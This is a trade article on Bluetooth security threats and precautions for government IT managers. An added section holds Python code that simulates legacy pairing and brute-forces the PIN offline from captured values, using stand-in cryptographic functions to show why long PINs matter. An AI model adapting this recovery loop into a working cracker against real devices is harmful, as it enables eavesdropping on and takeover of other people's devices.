GOVERNMENT TECHNOLOGY/Getting the blues?
Bluetooth technology is becoming ubiquitous among wireless devices. The short-range radio technology allows electronic devices, such as hand-held computers, laptops and printers, to communicate quickly without cables, typically within about 10 meters, or up to 100 meters for higher-power class 1 devices. However, the technology faces a problem common to all fast-emerging communications technologies: security.
There are many threats to Bluetooth devices. Bluejacking, for example, exploits a Bluetooth device’s ability to “discover” other nearby devices and sends them unsolicited messages. Bluesnarfing goes further, using flaws in some devices’ implementation of the object-exchange (OBEX) profile to pull data such as the address book and calendar off a device without the owner’s knowledge. Denial-of-service, eavesdropping, and use of a victim’s phone to place calls or send data (sometimes called bluebugging) also are security problems. Numerous instances of mobile viruses, worms and Trojan horses also have emerged in the past year. CIOs and IT managers should take the following minimum precautions against Bluetooth-enabled attacks:
Identify any government-issued Bluetooth devices and alert users of known vulnerabilities
IT managers also should alert employees who were reimbursed for purchasing their own devices and check with device suppliers about emerging vulnerabilities that have not yet been publicized.
Educate employees
Bluesnarfing and Bluejacking exploit naiveté as much as they exploit security flaws. Organizations should create comprehensive guidelines that identify the risks and penalties for using Bluetooth devices, even those that are government-approved. Employees must understand that devices can be vulnerable even when not in “visible” mode: non-discoverable mode only stops a device from answering inquiry scans, and an attacker who already knows or guesses its 48-bit device address can still attempt to connect.
Use caution when “pairing” devices
The pairing procedure’s reliance on a PIN to derive the link key that encrypts the connection is the most significant weakness known in the Bluetooth protocol itself, as distinct from flaws in individual devices’ software. During pairing the random challenges travel in the clear and the initial key is derived from the PIN, so an attacker who records the exchange can try every candidate PIN offline until the recorded responses match; a four-digit PIN has only 10,000 possibilities and can be exhausted in a fraction of a second on an ordinary PC. To make this impractical, use the longest PIN the devices allow (the specification permits up to 16 bytes), and do not pair devices in public places. Users also should be suspicious if previously paired devices unexpectedly request a new pairing: a recently published attack deliberately forces re-pairing so the attacker can observe the PIN-dependent exchange.
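The offline PIN search described above, worked through as an added example that is not from the article or from any Bluetooth stack. It models the legacy (pre-2.1) pairing flow: an initialization key is derived from the PIN and a random value sent in the clear, a link key is then built from two more random values that cross the air masked with that key, and each side proves it holds the link key by answering a random challenge with a 32-bit response. Assumptions: the real SAFER+-based E22, E21 and E1 functions are replaced by HMAC-SHA256 stand-ins so the code runs without a radio, and the device addresses are constructed. The recovery loop, which replays the derivation for each candidate PIN using only sniffed values, is the structure of the real attack.

```python
"""Offline PIN recovery against a sniffed legacy Bluetooth pairing (illustrative).

Assumption: E22/E21/E1 are SAFER+ based in the real protocol; here they are
HMAC-SHA256 stand-ins with the same inputs and output widths.
"""
import hashlib
import hmac
import itertools
import os


def _prf(key: bytes, label: bytes, *parts: bytes, out_len: int) -> bytes:
    return hmac.new(key, label + b"".join(parts), hashlib.sha256).digest()[:out_len]


def e22(pin: bytes, bd_addr: bytes, in_rand: bytes) -> bytes:
    """Initialization key K_init derived from the PIN (128-bit)."""
    return _prf(pin, b"E22", bd_addr, in_rand, out_len=16)


def e21(lk_rand: bytes, bd_addr: bytes) -> bytes:
    """One device's contribution to the combination (link) key (128-bit)."""
    return _prf(lk_rand, b"E21", bd_addr, out_len=16)


def e1(link_key: bytes, bd_addr: bytes, au_rand: bytes) -> bytes:
    """Authentication response SRES (32-bit, as in the real protocol)."""
    return _prf(link_key, b"E1", bd_addr, au_rand, out_len=4)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


# Constructed sample device addresses (BD_ADDR is 48 bits); not real devices.
ADDR_A = bytes.fromhex("001122334455")  # e.g. the PDA
ADDR_B = bytes.fromhex("66778899aabb")  # e.g. the phone


def legacy_pairing(pin: bytes, addr_a: bytes, addr_b: bytes, rng=os.urandom) -> dict:
    """Run pairing plus mutual authentication; return only what crosses the air."""
    in_rand = rng(16)                       # sent in the clear by A
    k_init = e22(pin, addr_b, in_rand)      # both sides compute this from the PIN
    lk_rand_a, lk_rand_b = rng(16), rng(16)
    # Each side sends its LK_RAND masked with K_init; the link key itself is never sent.
    link_key = xor(e21(lk_rand_a, addr_a), e21(lk_rand_b, addr_b))
    au_rand_a, au_rand_b = rng(16), rng(16)
    return {
        "addr_a": addr_a, "addr_b": addr_b, "in_rand": in_rand,
        "masked_lk_rand_a": xor(lk_rand_a, k_init),
        "masked_lk_rand_b": xor(lk_rand_b, k_init),
        "au_rand_a": au_rand_a, "sres_b": e1(link_key, addr_b, au_rand_a),  # A challenges B
        "au_rand_b": au_rand_b, "sres_a": e1(link_key, addr_a, au_rand_b),  # B challenges A
    }


def recover_pin(capture: dict, pin_digits: int):
    """Replay the derivation for every candidate PIN until both SRES values match.

    Uses only sniffed values. Returns (pin, candidates_tried), or (None, tried)
    if no PIN of that length reproduces the capture.
    """
    tried = 0
    for digits in itertools.product("0123456789", repeat=pin_digits):
        tried += 1
        pin = "".join(digits).encode()
        k_init = e22(pin, capture["addr_b"], capture["in_rand"])
        lk_rand_a = xor(capture["masked_lk_rand_a"], k_init)   # unmask with the guess
        lk_rand_b = xor(capture["masked_lk_rand_b"], k_init)
        link_key = xor(e21(lk_rand_a, capture["addr_a"]), e21(lk_rand_b, capture["addr_b"]))
        # Checking both directions of the mutual authentication avoids 32-bit false matches.
        if (e1(link_key, capture["addr_b"], capture["au_rand_a"]) == capture["sres_b"]
                and e1(link_key, capture["addr_a"], capture["au_rand_b"]) == capture["sres_a"]):
            return pin.decode(), tried
    return None, tried


if __name__ == "__main__":
    capture = legacy_pairing(b"1234", ADDR_A, ADDR_B)
    print(recover_pin(capture, 4))   # ('1234', 1235)
```

The work is linear in the number of candidates, so a four-digit PIN costs at most 10,000 replays while a 16-byte PIN would cost about 10^16 times more; that gap, not any secrecy of the exchange itself, is what the longer-PIN advice buys. A forced re-pairing matters because the attacker needs a fresh capture of this exchange, which an already-paired device would otherwise never produce.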
Strengthen IT policies
Bluetooth PDAs sell for as little as $100, increasing the chances that employees will buy them and bring them to work. Organizations should treat unauthorized PDAs, handsets and accessories like rogue access points; if employees understand the risks of Bluetooth use, then they must be held accountable for opening back doors into the network with unauthorized devices. Employees should be required to register their personal devices with IT departments so IT staff can adequately track devices that connect to the computer network.
Look for products with control over Bluetooth
Many PDAs feature a switch that lets users turn wireless on and off. If it can be shut off with the flick of a switch, employees are more likely to comply with security policies that require them to shut off Bluetooth when it is not in use.
Consider tools for identifying and mitigating security risks
IT managers can scan their networks for attached devices and remotely disable Bluetooth in government units. The latter may be necessary because, although shutting off the visible mode reduces exposure by hiding a device from discovery scans, it does not stop an attacker who already knows the device’s address, so some attacks bypass that protection.
The author is an architect for Cupertino, Calif.-based Symantec Research Labs.